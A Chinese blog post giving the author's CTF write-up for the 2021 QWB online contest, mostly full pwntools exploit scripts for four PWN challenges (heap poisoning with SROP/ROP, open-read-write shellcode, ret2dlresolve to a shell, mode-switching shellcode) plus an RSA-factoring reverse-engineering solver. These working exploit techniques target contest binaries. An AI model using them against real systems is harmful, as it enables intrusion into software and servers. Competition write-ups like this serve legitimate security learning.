WJH's Blog
WJH's Blog

强网杯线上赛PWN、RE部分Writeup

wjh wjh 收录于 Pwn Reverse CTF
  约 3700 字 预计阅读 8 分钟  - 次阅读   - 条评论  
目录
警告
本文最后更新于 2021-06-24,文中内容可能已过时。

比赛最后是 56 名,前面 ban 了很多,实际上 53 名就进了,可惜的是有一道题我没交上(因为一段时间的自闭,并且文件名搞错了,所以远程没有那么快的打通)

PWN

就是这道题,本地忘记替换 libseccomp.so.2 文件,导致远程和本地偏移不一致,远程一下子没打通。给自己几个大嘴巴子。

babypwn

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217

from pwn import *
from z3 import *

elf = None
libc = None
file_name = "./babypwn"
#context.timeout = 1


def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary


def get_libc(dic=""):
    libc = ELF('/home/wjh/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
    return libc


def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)


def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address


def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)


def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()


def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def choice(idx):
    sh.sendlineafter(">>> ", str(idx))
    #sleep(0.5)


def add(size):
    choice(1)
    sh.sendlineafter("size:", str(size))


def edit(idx, content):
    choice(3)
    sh.sendlineafter("index:", str(idx))
    sh.sendlineafter("content:", str(content))

def decode(data):
    solver = Solver()
    a1 = BitVec('a1', 32)
    t = a1
    for i in range(2):
        a1 ^= (32 * a1) ^ (LShR((a1 ^ (32 * a1)), 17)) ^ (((32 * a1) ^ a1 ^ (LShR((a1 ^ (32 * a1)), 17))) << 13)
    solver.add(a1 == data)
    solver.check()
    ans = solver.model()
    return p32(solver.model()[t].as_long())


def show(idx):
    choice(4)
    sh.sendlineafter("index:\n", str(idx))
    t1 = sh.recvuntil('\n', drop=True)
    t2 = sh.recvuntil('\n', drop=True)
    a1 = decode(int(t1, 16))
    a2 = decode(int(t2, 16))
    return a1 + a2


def delete(idx):
    choice(2)
    sh.sendlineafter("index:", str(idx))

def pwn(sh, elf, libc):
    context.log_level = "debug"
    for i in range(10):
        add(0x108)
    for i in range(0x7):
        add(0xb8) #10-16
    for i in range(7):
        delete(3 + i) #3-9


    edit(1, 'a' * 0x30 + p64(0x40) + 'a' * 0xB8 + p64(0x100))
    delete(1)
    edit(0, 'a' * 0x108)
    edit(0, 'a' * 0x100 + p64(0x110))

    add(0xb8) #1
    add(0x38) #3
    add(0x38) #4

    libc_base = u64(show(1)) - 0x3ebd90
    log.success("libc_base:\t" + hex(libc_base))
    for i in range(7):
        delete(10 + i)
    delete(1)
    #gdb.attach(sh, "b _int_free")
    delete(2)
    add(0x98) #1
    add(0x58) #2
    edit(2, '\x00' * 0x18 + p64(0x201))
    delete(4)
    libc.address = libc_base
    free_hook_addr = libc.sym['__free_hook']
    edit(2, '\x00' * 0x18 + p64(0x201) + p64(free_hook_addr))
    add(0x1F8) #4
    add(0x1F8) #5

    pop_rdi_addr = libc.address + 0x000000000002155f
    pop_rsi_addr = libc.address + 0x0000000000023e6a
    pop_rdx_addr = libc.address + 0x0000000000001b96
    fake_frame_addr = libc.sym['__free_hook']
    frame = SigreturnFrame()

    frame.rax = 0
    frame.rdi = fake_frame_addr + 0xF8
    frame.rsp = fake_frame_addr + 0xF8 + 0x10 + 0x8
    frame.rip = pop_rdi_addr + 1  # : ret
    #log.success("libc.sym[open]:\t" + hex(libc.sym))
    rop_data = [
        libc.sym['open'],
        pop_rdx_addr,
        0x100,
        pop_rdi_addr,
        3,
        pop_rsi_addr,
        fake_frame_addr + 0x200,
        libc.sym['read'],
        pop_rdi_addr,
        fake_frame_addr + 0x200,
        libc.sym['puts']
    ]
    edit(5, p64(libc_base + 0x520a5) + str(frame)[8:0xF8] + "flag.txt" + p64(0) * 2 + flat(rop_data))
    #
    delete(5)

    sh.interactive()


if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]orw

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162

from pwn import *
elf = None
libc = None
file_name = "./pwn"
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag
def choice(idx):
    sh.sendlineafter("choice >>", str(idx))

def add(index, size, content):
    choice(1)
    sh.sendlineafter("index:", str(index))
    sh.sendlineafter("size:", str(size))
    sh.sendlineafter("content:", str(content))
def pwn(sh, elf, libc):
    context.log_level = "debug"
    orw_payload = '''
    /* open(file='./flag.txt', oflag=0, mode=0) */
    /* push './flag.txt\x00' */
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c662f2e
    xor [rsp], rax
    mov rdi, rsp
    xor edx, edx /* 0 */
    xor esi, esi /* 0 */
    /* call open() */
    push SYS_open /* 2 */
    pop rax
    syscall
    xor eax, eax /* SYS_read */
    push 3
    pop rdi
    push 0x50
    pop rdx
    mov rsi, r13
    syscall
    /* write(fd=1, buf=0x123000, n=0x50) */
    push 1
    pop rdi
    /* call write() */
    push SYS_write /* 1 */
    pop rax
    syscall
    '''
    add(-13, 0, asm(orw_payload))
    #get_gdb(sh)
    choice(5)
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]no_output

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146

from pwn import *
import roputils
elf = None
libc = None
file_name = "./test"
context.timeout = 1

def get_file(dic=""):
    context.binary = dic + file_name
    return context.binary

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag

def pwn(sh, elf, libc):
    context.log_level = "debug"
    #gdb.attach(sh, "b *0x8049236")
    sh.send('\x00' * 0x30)
    sleep(0.1)
    sh.send('a' * 0x20)
    sleep(0.1)
    sh.send('hello_boy\x00')
    sleep(0.1)
    sh.sendline("-2147483648")
    sh.sendline("-1")
    #sh.send('a' * 0x48 + 'b' * 4 + p32(0x8049236))
    sleep(0.1)
    rop = roputils.ROP_I386(file_name)
    addr_bss = rop.section('.bss')
    buf = rop.retfill(0x48 + 0x4)
    buf += rop.call('read', 0, addr_bss, 100)
    buf += rop.dl_resolve_call(addr_bss + 20, addr_bss)
    sh.send(buf)
    buf = rop.string('/bin/sh')
    buf += rop.fill(20, buf)
    buf += rop.dl_resolve_data(addr_bss + 20, 'system')
    buf += rop.fill(100, buf)
    sh.send(buf)
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

[强网先锋]shellcode

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317

from pwn import *
elf = None
libc = None
file_name = "./shellcode"
context.timeout = 1

def get_file(dic=""):
    #context.binary =
    return ELF(dic + file_name)

def get_libc(dic=""):
    libc = None
    try:
        data = os.popen("ldd {}".format(dic + file_name)).read()
        for i in data.split('\n'):
            libc_info = i.split("=>")
            if len(libc_info) == 2:
                if "libc" in libc_info[0]:
                    libc_path = libc_info[1].split(' (')
                    if len(libc_path) == 2:
                        libc = ELF(libc_path[0].replace(' ', ''), checksec=False)
                        return libc
    except:
        pass
    if context.arch == 'amd64':
        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
    elif context.arch == 'i386':
        try:
            libc = ELF("/lib/i386-linux-gnu/libc.so.6", checksec=False)
        except:
            libc = ELF("/lib32/libc.so.6", checksec=False)
    return libc

def get_sh(Use_other_libc=False, Use_ssh=False):
    global libc
    if args['REMOTE']:
        if Use_other_libc:
            libc = ELF("./libc.so.6", checksec=False)
        if Use_ssh:
            s = ssh(sys.argv[3], sys.argv[1], sys.argv[2], sys.argv[4])
            return s.process(file_name)
        else:
            return remote(sys.argv[1], sys.argv[2])
    else:
        return process(file_name)

def get_address(sh, libc=False, info=None, start_string=None, address_len=None, end_string=None, offset=None,
                int_mode=False):
    if start_string != None:
        sh.recvuntil(start_string)
    if libc == True:
        return_address = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    elif int_mode:
        return_address = int(sh.recvuntil(end_string, drop=True), 16)
    elif address_len != None:
        return_address = u64(sh.recv()[:address_len].ljust(8, '\x00'))
    elif context.arch == 'amd64':
        return_address = u64(sh.recvuntil(end_string, drop=True).ljust(8, '\x00'))
    else:
        return_address = u32(sh.recvuntil(end_string, drop=True).ljust(4, '\x00'))
    if offset != None:
        return_address = return_address + offset
    if info != None:
        log.success(info + str(hex(return_address)))
    return return_address

def get_flag(sh):
    sh.recvrepeat(0.1)
    sh.sendline('cat flag.txt')
    return sh.recvrepeat(0.3)

def get_gdb(sh, gdbscript=None, addr=0, stop=False):
    if args['REMOTE']:
        return
    if gdbscript is not None:
        gdb.attach(sh, gdbscript=gdbscript)
    elif addr is not None:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(sh.pid)).readlines()[1], 16)
        log.success("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(sh, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(sh)
    if stop:
        raw_input()

def Attack(target=None, sh=None, elf=None, libc=None):
    if sh is None:
        from Class.Target import Target
        assert target is not None
        assert isinstance(target, Target)
        sh = target.sh
        elf = target.elf
        libc = target.libc
    assert isinstance(elf, ELF)
    assert isinstance(libc, ELF)
    try_count = 0
    while try_count < 3:
        try_count += 1
        try:
            pwn(sh, elf, libc)
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            if target is not None:
                sh = target.get_sh()
                target.sh = sh
                if target.connect_fail:
                    return 'ERROR : Can not connect to target server!'
            else:
                sh = get_sh()
    flag = get_flag(sh)
    return flag
flag = ""
def do(sh, k):
    global flag
    context.log_level = "error"
    #
    append_x86 = '''
    push ebx
    pop ebx
    '''
    shellcode_x86 = '''
    /*fp = open("flag.txt")*/
    mov esp,0x40404140
    push 0x67616c66
    push esp
    pop ebx
    xor ecx,ecx
    mov eax,5
    int 0x80
    '''
    shellcode_x86 = shellcraft.i386.linux.open('flag')
    shellcode_x86 = "mov esp,0x40404140\n" + shellcode_x86
    shellcode_x86 +='''mov ecx,eax
    push 0x33
    push 0x404040A0
    '''
    #print shellcode_x86
    shellcode_flag1 = '''
    retfq  
    /*read(fp,buf,0x70)*/
    mov rdi, rcx
    mov rsi,0x40404500
    mov rdx,0x70
    xor rax,rax
    syscall
    mov rbx, 0
  
    get:
    /*read(0,buf,0x70)*/
    mov rdi, 0
    mov rsi, 0x40404600
    xor rax,rax
    mov rdx, 2
    syscall
  
    mov bl, [rsi]
    mov rsi, 0x40404500
    mov al, [rsi + {0}]
    cmp al, bl
    jne get
    jmp cat
    cat:
    mov rax, 231
    syscall
    '''.format(k)
    shellcode_flag = shellcraft.read("ecx", "esp", 0x30)
    shellcode_flag += shellcraft.write(1, "esp", 0x30)
    shellcode_x86 = asm(shellcode_x86)
    shellcode_flag = asm(shellcode_flag1, arch='amd64', os='linux')
    shellcode = ''
    append = '''
    push rdx
    pop rdx
    '''
    shellcode_mmap = '''
    /*mmap(0x40404040,0x7e,7,34,0,0)*/
    push 0x40404040 /*set rdi*/
    pop rdi
    push 0x7e /*set rsi*/
    pop rsi
    push 0x40 /*set rdx*/
    pop rax
    xor al,0x47
    push rax
    pop rdx
    push 0x40 /*set r8*/
    pop rax
    xor al,0x40
    push rax
    pop r8
    push rax /*set r9*/
    pop r9
    /*syscall*/
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr[rax+0x31],cl
    push 0x5f
    pop rcx
    xor byte ptr[rax+0x32],cl
    push 0x22 /*set rcx*/
    pop rcx
    push 0x40/*set rax*/
    pop rax
    xor al,0x49
    '''
    shellcode_read = '''
    /*read(0,0x40404040,0x70)*/
    push 0x40404040
    pop rsi
    push 0x40
    pop rax
    xor al,0x40
    push rax
    pop rdi
    xor al,0x40
    push 0x70
    pop rdx
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr[rax+0x59],cl
    push 0x5f
    pop rcx
    xor byte ptr[rax+0x5A],cl
    push rdx
    pop rax
    push rsi
    pop rdx
    xor al,0x70
    '''
    shellcode_retfq = '''
    push rbx
    pop rax
    xor al,0x40
    push 0x72
    pop rcx
    xor byte ptr[rax+0x42],cl
    push 0x68
    pop rcx
    xor byte ptr[rax+0x42],cl
    push 0x47
    pop rcx
    sub byte ptr[rax+0x43],cl
    push 0x48
    pop rcx
    sub byte ptr[rax+0x43],cl
    push rdi
    push rdi
    push 0x23
    push 0x40404040
    pop rax
    push rax
    '''
    shellcode += shellcode_mmap
    shellcode += append
    shellcode += shellcode_read
    shellcode += append
    shellcode += shellcode_retfq
    shellcode += append
    shellcode = asm(shellcode, arch='amd64', os='linux')
    #print hex(len(shellcode))
    #print shellcode
    #gdb.attach(sh, "b *0x000000000040026D")
    context.log_level = "debug"
    sh.sendline(shellcode)

    #raw_input()
    # pause()
    sleep(1)
    #raw_input()
    sh.sendline(shellcode_x86.ljust(0x5E, '\x90') + shellcode_flag)
    #sh.interactive()
    last = "n"
    #context.log_level = "debug"
    ddd = "\x00" + string.digits + string.letters + "{}"
    for i in ddd:
        try:
            #raw_input()
            sh.sendline(i)
            sleep(0.1)
            last = i
            try:
                cur = sh.recv(timeout=0.05)
                cur = cur.replace(sh.newline, b'\n')
                if cur:
                    stdout = sys.stdout
                    if not term.term_mode:
                        stdout = getattr(stdout, 'buffer', stdout)
                    stdout.write(cur)
                    stdout.flush()
            except EOFError:
                log.success('Got EOF while reading in interactive')
            #print sh.closed
            if sh == None or sh.closed['recv']:
                raise EOFError

        except EOFError:
            flag += last
            print
            break
def pwn(sh, elf, libc):
    for k in range(0x30):
        print k, flag
        do(sh, k)
        sh = get_sh()
    sh.interactive()

if __name__ == "__main__":
    sh = get_sh()
    flag = Attack(sh=sh, elf=get_file(), libc=get_libc())
    sh.close()
    log.success('The flag.txt is ' + re.search(r'flag.txt{.+}', flag).group())

RE

StandOnTheGiants 看 native 函数发现是个 RSA,分解后 + 爆破 base64 内容,最后得到 flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

import gmpy2
from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.number import *
import base64
import string
def encode(x):
    n = 0x1321D2FDDDE8BD9DFF379AFF030DE205B846EB5CECC40FA8AA9C2A85CE3E992193E873B2BC667DABE2AC3EE9DD23B3A9ED9EC0C3C7445663F5455469B727DD6FBC03B1BF95D03A13C0368645767630C7EABF5E7AB5FA27B94ADE7E1E23BCC65D2A7DED1C5B364B51
    e = 0x10001
    t = pow(x, e, n)
    str1 = base64.b64encode(long_to_bytes(t)).decode()
    string1 = r"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-"
    string2 = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    print(str1)
    str1 = str1.translate(str.maketrans(string2, string1))
    return str1

test = bytes_to_long(('a' * 0x20).encode())
test = encode(test)
print(test)

#print(hex())
n_data = 0x1321D2FDDDE8BD9DFF379AFF030DE205B846EB5CECC40FA8AA9C2A85CE3E992193E873B2BC667DABE2AC3EE9DD23B3A9ED9EC0C3C7445663F5455469B727DD6FBC03B1BF95D03A13C0368645767630C7EABF5E7AB5FA27B94ADE7E1E23BCC65D2A7DED1C5B364B51
p = 33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
q = 64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
e = 0x010001
n = p * q
assert(n == n_data)

str1 = "bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="
#str1 = test
str1 = str1.replace('-', '\n')
str1 = str1.replace('+', '\t')
string1 = r"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-"
string2 = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
str1 = str1.translate(str.maketrans(string1,string2))
data = str1.split('\n')
data2 = []
def dfs2(x, get):
    if x == len(data2):
        c = base64.b64decode(get)
        c = bytes_to_long(c)
        # print(hex(c))
        phi = (p - 1) * (q - 1)
        d = gmpy2.invert(e, phi)
        m = pow(c, d, n)
        m = long_to_bytes(m)
        for i in m:
            if chr(i) not in string.printable:
                return
        print(m)
        return
    dfs2(x + 1, get + r"1" + data2[x])
    dfs2(x + 1, get + r"+" + data2[x])

def dfs(x, get):
    global data2
    if x == len(data):
        data2 = get.split('\t')
        dfs2(1, data2[0])
        return
    dfs(x + 1, get + r"3" + data[x])
    dfs(x + 1, get + r"/" + data[x])

print(data)
dfs(1, data[0])
#print(bytes_to_long(n_data))
更新于 2021-06-24 
CC BY-NC-SA 4.0
返回 | 主页
0%